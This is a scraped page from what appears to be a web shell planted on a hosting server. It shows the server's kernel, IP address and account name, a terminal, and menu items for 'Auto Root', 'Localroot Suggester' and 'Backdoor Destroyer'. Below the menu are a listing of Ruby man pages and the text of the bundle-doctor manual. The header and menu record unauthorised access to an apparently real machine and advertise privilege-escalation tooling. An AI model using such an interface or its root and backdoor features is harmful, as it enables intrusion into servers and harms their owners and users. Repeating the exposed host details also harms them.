Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
man /
man1 /
Delete
Unzip
Name
Size
Permission
Date
Action
bundle-add.1
2.5
KB
-rw-r--r--
2025-04-24 13:27
bundle-binstubs.1
1.55
KB
-rw-r--r--
2025-04-24 13:27
bundle-cache.1
3.36
KB
-rw-r--r--
2025-04-24 13:27
bundle-check.1
1.07
KB
-rw-r--r--
2025-04-24 13:27
bundle-clean.1
726
B
-rw-r--r--
2025-04-24 13:27
bundle-config.1
21.01
KB
-rw-r--r--
2025-04-24 13:27
bundle-console.1
1.62
KB
-rw-r--r--
2025-04-24 13:27
bundle-doctor.1
1.11
KB
-rw-r--r--
2025-04-24 13:27
bundle-exec.1
6.44
KB
-rw-r--r--
2025-04-24 13:27
bundle-gem.1
5.48
KB
-rw-r--r--
2025-04-24 13:27
bundle-help.1
448
B
-rw-r--r--
2025-04-24 13:27
bundle-info.1
470
B
-rw-r--r--
2025-04-24 13:27
bundle-init.1
1.12
KB
-rw-r--r--
2025-04-24 13:27
bundle-inject.1
815
B
-rw-r--r--
2025-04-24 13:27
bundle-install.1
16.43
KB
-rw-r--r--
2025-04-24 13:27
bundle-list.1
948
B
-rw-r--r--
2025-04-24 13:27
bundle-lock.1
3.07
KB
-rw-r--r--
2025-04-24 13:27
bundle-open.1
790
B
-rw-r--r--
2025-04-24 13:27
bundle-outdated.1
3.18
KB
-rw-r--r--
2025-04-24 13:27
bundle-platform.1
1.39
KB
-rw-r--r--
2025-04-24 13:27
bundle-plugin.1
2.11
KB
-rw-r--r--
2025-04-24 13:27
bundle-pristine.1
1.62
KB
-rw-r--r--
2025-04-24 13:27
bundle-remove.1
836
B
-rw-r--r--
2025-04-24 13:27
bundle-show.1
677
B
-rw-r--r--
2025-04-24 13:27
bundle-update.1
13.35
KB
-rw-r--r--
2025-04-24 13:27
bundle-version.1
618
B
-rw-r--r--
2025-04-24 13:27
bundle-viz.1
1.2
KB
-rw-r--r--
2025-04-24 13:27
bundle.1
3.67
KB
-rw-r--r--
2025-04-24 13:27
erb.1
3.25
KB
-rw-r--r--
2025-04-24 13:27
rake.1
3.64
KB
-rw-r--r--
2025-04-24 13:27
ri.1
5.22
KB
-rw-r--r--
2025-04-24 13:27
ruby.1
21.04
KB
-rw-r--r--
2025-04-24 13:27
Save
Rename
.\" generated with nRonn/v0.11.1 .\" https://github.com/n-ronn/nronn/tree/0.11.1 .TH "BUNDLE\-DOCTOR" "1" "September 2024" "" .SH "NAME" \fBbundle\-doctor\fR \- Checks the bundle for common problems .SH "SYNOPSIS" \fBbundle doctor\fR [\-\-quiet] [\-\-gemfile=GEMFILE] .SH "DESCRIPTION" Checks your Gemfile and gem environment for common problems\. If issues are detected, Bundler prints them and exits status 1\. Otherwise, Bundler prints a success message and exits status 0\. .P Examples of common problems caught by bundle\-doctor include: .IP "\(bu" 4 Invalid Bundler settings .IP "\(bu" 4 Mismatched Ruby versions .IP "\(bu" 4 Mismatched platforms .IP "\(bu" 4 Uninstalled gems .IP "\(bu" 4 Missing dependencies .IP "" 0 .SH "OPTIONS" .TP \fB\-\-quiet\fR Only output warnings and errors\. .TP \fB\-\-gemfile=<gemfile>\fR The location of the Gemfile(5) which Bundler should use\. This defaults to a Gemfile(5) in the current working directory\. In general, Bundler will assume that the location of the Gemfile(5) is also the project's root and will try to find \fBGemfile\.lock\fR and \fBvendor/cache\fR relative to this location\.